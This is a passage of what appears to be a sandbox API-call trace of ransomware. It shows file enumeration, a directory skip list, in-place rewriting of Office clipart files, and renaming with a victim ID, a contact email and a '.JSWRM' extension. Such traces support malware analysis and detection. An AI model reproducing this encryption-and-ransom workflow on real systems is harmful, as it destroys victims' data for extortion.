HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292286.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292286.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292286.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0089.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.052] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19286) returned 1 [0089.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b50) returned 0x24d210 [0089.052] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b50, lpOverlapped=0x0) returned 1 [0089.055] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.055] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b50, lpOverlapped=0x0) returned 1 [0089.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.055] CloseHandle (hObject=0x314) returned 1 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0089.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0089.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0089.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.056] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.056] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0293800.WMF", cAlternateFileName="")) returned 1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2=".") returned 1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2="..") returned 1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2="...") returned 1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2="windows") returned -1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2="recovery") returned -1 [0089.056] lstrcmpiW (lpString1="J0293800.WMF", lpString2="perflogs") returned -1 [0089.057] lstrcmpiW (lpString1="J0293800.WMF", lpString2="documents and settings") returned 1 [0089.057] lstrcmpiW (lpString1="J0293800.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.057] lstrcmpiW (lpString1="J0293800.WMF", lpString2="system volume information") returned -1 [0089.057] lstrcmpiW (lpString1="J0293800.WMF", lpString2="msocache") returned -1 [0089.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293800.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293800.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0293800.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293800.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293800.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0293800.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.057] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4774) returned 1 [0089.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12a0) returned 0x205850 [0089.057] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12a0, lpOverlapped=0x0) returned 1 [0089.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.063] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12a0, lpOverlapped=0x0) returned 1 [0089.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.063] CloseHandle (hObject=0x314) returned 1 [0089.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0089.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0089.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.064] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.065] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0293832.WMF", cAlternateFileName="")) returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2=".") returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="..") returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="...") returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="windows") returned -1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="recovery") returned -1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="perflogs") returned -1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="documents and settings") returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="system volume information") returned -1 [0089.065] lstrcmpiW (lpString1="J0293832.WMF", lpString2="msocache") returned -1 [0089.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293832.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293832.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0293832.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293832.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0293832.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0293832.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.066] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6078) returned 1 [0089.066] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b0) returned 0x205850 [0089.067] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x17b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x17b0, lpOverlapped=0x0) returned 1 [0089.069] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.069] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x17b0, lpOverlapped=0x0) returned 1 [0089.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.069] CloseHandle (hObject=0x314) returned 1 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0089.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0089.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0089.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.070] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37de, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0294989.WMF", cAlternateFileName="")) returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2=".") returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="..") returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="...") returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="windows") returned -1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="recovery") returned -1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="perflogs") returned -1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="documents and settings") returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="system volume information") returned -1 [0089.070] lstrcmpiW (lpString1="J0294989.WMF", lpString2="msocache") returned -1 [0089.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294989.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294989.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0294989.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294989.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294989.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0294989.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0089.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.072] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14302) returned 1 [0089.072] SetFilePointer (in: hFile=0x314, 